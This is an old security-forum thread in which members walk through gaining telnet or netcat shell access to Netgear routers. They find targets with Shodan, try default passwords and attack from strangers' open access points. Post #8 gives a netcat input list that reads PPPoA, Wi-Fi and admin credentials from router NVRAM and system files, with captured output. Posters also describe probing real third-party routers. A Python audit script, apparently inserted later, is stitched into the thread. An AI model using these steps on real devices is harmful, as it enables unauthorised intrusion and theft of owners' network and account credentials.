Government Security
Network Security Resources


Detailed Netgear Router Exploit

9 replies to this topic

#1 Kenny

Kenny

    Former Commander In Chief

  • Retired Admin
  • 6,747 posts

Posted 02 December 2009 - 03:11 AM

Here is a link to the full article I wrote, hope you enjoy ;)

This article will show you how to access the router and inject a command, enabling Telnet or Netcat access. It is a step-by-step tutorial with images.

==================================================


Netgear Router Hack

30/11/2009

Hello all

Kenny from GSO Admin here, showing you a demo of gaining access to a Netgear router, then Telnet or Netcat to the target.

The reason I wrote this is for educational purposes, for the GSO Tutorials section. Old news for many, still it adds content to GSO: http://www.governmentsecurity.org

DETAILS:

Tools I will be using are: Angry IP Scanner, Firefox and Telnet or Netcat.

For this demo I have to make some changes: one, instead of using Linux, which I use most of the time, I will be using XP Pro, as the majority of GSO users use Windows in one form or another.
But the router commands will be in the traditional Linux inputs.

1) I am NOT using my ISP for this hack. What I have done is found an open, un-encrypted access point to launch my attack, after scanning my local area and switching to the open router AP.

2) First I am going to scan a network for open ports, mainly 23 and 80. This will give at least port 80, needed to inject the code.

........................
Kenny aka ComSec

Please read the Forum Rules !!!

______________________

#2 Marts McFly

Marts McFly

    Global Moderator

  • Colonel
  • 591 posts

Posted 02 December 2009 - 04:44 PM

Nice tutorial Kenny. Was particularly interested in the Netgear aspect (as I have one myself).

You scanned a public range of IP addresses and then pinpointed which ones were Netgear, yeah? I was playing around with Shodan search. (I have to say it is one of the coolest new services I've seen out in a while, and now there is a FF plugin.) http://shodan.surtri.com/ (Basically it is a search engine which picks up pre-scanned services on the public internet, no need to port scan yourself ;))

I'm veering off the subject a little bit, but you may be able to achieve similar preliminary results. Problem being, as this service is public, most of these boxes would probably be compromised pretty quick. But it gets you thinking of other ways to attack this problem, or some creative searches you may think up before anyone else.

If you search with this command you will find a list of open BusyBox installations: “port:23 “list of built-in commands””
Certified Information Systems Security Professional (CISSP)

T: http://twitter.com/Marts_McFly

B: http://www.backtosecurity.com

#3 Kenny

Kenny

    Former Commander In Chief

  • Retired Admin
  • 6,747 posts

Posted 02 December 2009 - 07:30 PM

Very nice indeed, added to my browser. Interesting what you said; I had a quick go with a few different inputs. I got over 500 with one method,
with another input I got over 3500, and also got 11000 of another router make vuln...

Am going to experiment to see just how useful this plugin is. Thanks for the heads up, definitely handy one way or another :)

#4 Marts McFly

Marts McFly

    Global Moderator

  • Colonel
  • 591 posts

Posted 02 December 2009 - 07:57 PM

Yeah it's sweet. Wish I had more time to play with it. Just did a search for Netgear... oh, when will people learn to change the default password ;)

Extending on your tutorial a bit, as I've never used BusyBox: I see that wget commands are available. Would it be possible to wget a binary and install that software to NVRAM? Or are there restrictions on these devices? Just toying with the idea of whether you could install some sort of SSH proxy tunnel in and back out of these devices.

Edit: Was just playing around searching for Netgear WAPs on my provider's network. Found some open ones. Using your trick someone may be able to check the NVRAM and see the ADSL username and password, which for my provider is usually the same as for their online management account for email and billing, not to mention changing their firewall rules: allow all incoming from <%ip>... uh oh :P

Edit2: Uhh, someone may have just found a company running a server and 8 desktops and a POS terminal with an open Netgear as their gateway. Time for someone to stop playing around before he gets into trouble!

#5 Kenny

Kenny

    Former Commander In Chief

  • Retired Admin
  • 6,747 posts

Posted 03 December 2009 - 07:11 AM

Looks like you did the same search as me; I also think I got the same server. I also tested about 10 random IPs, 60% were using default. These people will learn one day. I have not tested wget yet but would assume it might work within that environment. All I have been doing is snooping around just for gathering info. I have got BusyBox compiled and installed on one of my Linux setups; just a case of getting around to testing its full potential. Am still experimenting with BusyBox ;)

#6 Marts McFly

Marts McFly

    Global Moderator

  • Colonel
  • 591 posts

Posted 03 December 2009 - 03:52 PM

Just a note: Couldn't get the debug command to work on a Netgear DG834GV.

Another thing of interest: is there a way to access telnet after the debug command using its WAN IP address? Firewall fully open. Tested out one and couldn't seem to connect...

#7 Kenny

Kenny

    Former Commander In Chief

  • Retired Admin
  • 6,747 posts

Posted 04 December 2009 - 03:49 AM

Netgear use various default passwords for some models. Some routers have:

admin
admin

or

admin
1234

and so on

A list of some can be found here:

http://www.routerpasswords.com/ or here: http://www.phenoelit-us.org/dpl/dpl.html

You might have to search for other models' defaults.

Some ISPs have blocked access to BusyBox via Telnet or Netcat with Debug enabled via its firmware image, one being SkyBB: no matter what password you use it will not let you in. OllyDbg might show more details if the firmware is disassembled.

#8 Kenny

Kenny

    Former Commander In Chief

  • Retired Admin
  • 6,747 posts

Posted 04 December 2009 - 03:58 PM

On a footnote, I decided to speed up the process of getting details, so what I have done is create a list of inputs, for instance:


ps
cat /tmp/nvram | grep pppoa_
cat /tmp/nvram | grep wifi_passphrase
cat /tmp/nvram | grep wifi_psk_pwd
cat /etc/syslog.conf
cat /etc/passwd
cat /etc/htpasswd
exit



and called it "inputs.txt".

Then created a folder and added "netcat" to it on my desktop along with the "inputs.txt".

Then issued this command (stdin redirected from the input file, stdout redirected to the saved file):

nc <IP> <PORT> < <input file> > <saved file>


Example:

nc 192.168.1.1 23 < inputs.txt > results.txt


This then automates the process and saves the results to your folder. See saved example below:

===========================

ÿýÿý!ÿûÿû

BusyBox v1.00 (2007.06.22-11:05+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
²☺ ²! ¹☺ ¹♥ps

# ps
PID Uid VmSize Stat Command
1 root 268 S init
2 root SW< [ksoftirqd/0]
3 root SW< [events/0]
4 root SW< [khelper]
5 root SW< [kblockd/0]
17 root SW [pdflush]
18 root SW [pdflush]
19 root SW [kswapd0]
20 root SW< [aio/0]
25 root SW [mtdblockd]
32 root SW [kseriod]
57 root 224 S /usr/sbin/mybuf /var/run/mybuf.in /var/log/vpn
58 root 144 S /usr/sbin/vpn_trigger
97 root 244 S /sbin/klogd
106 root 280 S /sbin/syslogd -f /etc/syslog.conf
116 root 260 S /usr/sbin/mini_httpd -d /www -r NETGEAR DG834G -c **
118 root 260 S /usr/sbin/udhcpd /etc/udhcpd.conf
120 root 264 S /usr/sbin/netgear_ntp -z GMT+0
327 root 244 S /usr/sbin/crond
329 root 172 S /usr/sbin/scfgmgr
333 root 176 S /usr/sbin/cmd_agent_ap
334 root 164 S /usr/sbin/pb_ap
346 root 268 S init
10337 root 524 S /usr/sbin/pppd plugin pppoa 0.38 user *********@talktalk.net
10368 root 500 S dnrd -a 192.168.0.1 -m hosts -c off -b -s ***.***.***.***
16497 root 220 S /usr/sbin/utelnetd -d
16511 root 348 S /bin/sh
16512 root 284 R ps
#
# cat /tmp/nvram | grep pppoa_
pppoa_username=********@talktalk.net
pppoa_password=******
pppoa_idle=0
pppoa_ipaddr=
#
# cat /tmp/nvram | grep wifi_passphrase
wifi_passphrase=*****
#
# cat /tmp/nvram | grep wifi_psk_pwd
wpa_passphrase=*******
#
# cat /etc/syslog.conf
mail_enable=0
mail_enable_auth=
mail_log_full=0
mail_server=
mail_receiver=
mail_login=
mail_password=
mail_subject=NETGEAR Security Log [03:27:6D]
mail_subject_alert=NETGEAR *Security Alert* [03:27:6D]
mail_keyword=[DOS] [PORT SCAN] [BLOCK]
TZ=GMT+0
daylight=
log_auth=1
log_syslog=1
log_local0=1
log_keyword=[DOS] [PORT SCAN] [BLOCK]
#
# cat /etc/passwd
root::0:0:root:/:/bin/sh
nobody::99:99:Nobody:/:/sbin/sh
#
# cat /etc/htpasswd
admin:password
#
# exit

========================

You can edit the list to put your own inputs and read the data later ;)
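As an added example (not Kenny's code or anything from the thread), here is a Python audit of a saved results.txt transcript in the format shown above, written from the owner's side: it strips the telnet negotiation bytes (the ÿýÿý! at the top of the capture), groups output under the "# command" prompt that produced it, and flags what someone reviewing their own router would want to know: the debug telnet daemon still running, credentials readable from /tmp/nvram, passwordless shell accounts, and a default admin:password in /etc/htpasswd. The sample transcript and its values are constructed placeholders.

```python
import re
# Telnet option negotiation: IAC (0xFF) + DO/DONT/WILL/WONT (0xFB..0xFE) + option byte,
# or IAC + one command byte (0xF0..0xFA). Strip these before parsing the text.
IAC_RE = re.compile(rb"\xff[\xfb-\xfe].|\xff[\xf0-\xfa]", re.DOTALL)
SENSITIVE_KEYS = {"pppoa_password", "wifi_passphrase", "wpa_passphrase", "wifi_psk_pwd"}
DEFAULT_HTPASSWD = {("admin", "password"), ("admin", "admin"), ("admin", "1234")}

def strip_telnet_negotiation(raw: bytes) -> str:
    return IAC_RE.sub(b"", raw).decode("latin-1")

def split_commands(text: str) -> dict:
    """Group output lines under the '# <cmd>' prompt line that produced them."""
    sections, current = {}, None
    for line in text.splitlines():
        if line.startswith("# "):
            current = line[2:].strip()
            sections.setdefault(current, [])
        elif current is not None and line.strip() not in ("", "#"):
            sections[current].append(line.rstrip())
    return sections

def audit(raw: bytes) -> list:
    """Return human-readable findings for one saved session transcript."""
    findings = []
    for cmd, lines in split_commands(strip_telnet_negotiation(raw)).items():
        if cmd == "ps" and any("utelnetd" in ln for ln in lines):
            findings.append("utelnetd is running: debug telnet was left enabled")
        elif cmd.startswith("cat /tmp/nvram"):
            for key, _, value in (ln.partition("=") for ln in lines):
                if key in SENSITIVE_KEYS and value:
                    findings.append(f"{key} is readable from NVRAM via '{cmd}'")
        elif cmd == "cat /etc/passwd":
            for f in (ln.split(":") for ln in lines):
                if len(f) >= 7 and f[1] == "" and f[6].endswith("sh"):
                    findings.append(f"account '{f[0]}' has an empty password and a shell")
        elif cmd == "cat /etc/htpasswd":
            for user, _, pw in (ln.partition(":") for ln in lines):
                if (user, pw) in DEFAULT_HTPASSWD:
                    findings.append(f"web admin uses default credential {user}:{pw}")
    return findings
# Constructed sample transcript mirroring the redacted one in the post; values are placeholders.
SAMPLE = (b"\xff\xfd\x01\xff\xfd\x21\xff\xfb\x01\xff\xfb\x03BusyBox v1.00 Built-in shell (ash)\n"
          b"# ps\nPID Uid VmSize Stat Command\n16497 root 220 S /usr/sbin/utelnetd -d\n#\n"
          b"# cat /tmp/nvram | grep pppoa_\npppoa_username=user@example.net\n"
          b"pppoa_password=EXAMPLE\npppoa_ipaddr=\n#\n# cat /etc/passwd\nroot::0:0:root:/:/bin/sh\n"
          b"nobody::99:99:Nobody:/:/sbin/sh\n#\n# cat /etc/htpasswd\nadmin:password\n#\n# exit\n")

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print("FINDING:", finding)
```

Run it against a real results.txt by replacing SAMPLE with the file's bytes; any finding is something to fix on the router (disable debug, change the admin password) rather than something to collect.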

#9 Marts McFly

Marts McFly

    Global Moderator

  • Colonel
  • 591 posts

Posted 04 December 2009 - 06:13 PM

Ah nice one man! That will make life a little easier.

On a side note - was just reading an article on remote-exploit. They go over how to 'enable' telnet access on a Netgear router which has the Telnet port open but the Telnet service not running. Pretty good information actually. http://forums.remote...ar-routers.html

#10 Aldous11

Aldous11

    Private

  • Members
  • 2 posts

Posted 01 October 2010 - 11:44 PM

I enjoyed it a lot. It's a very informative and helpful tutorial. Your method of describing is very good and easy to use. Thanks for sharing.




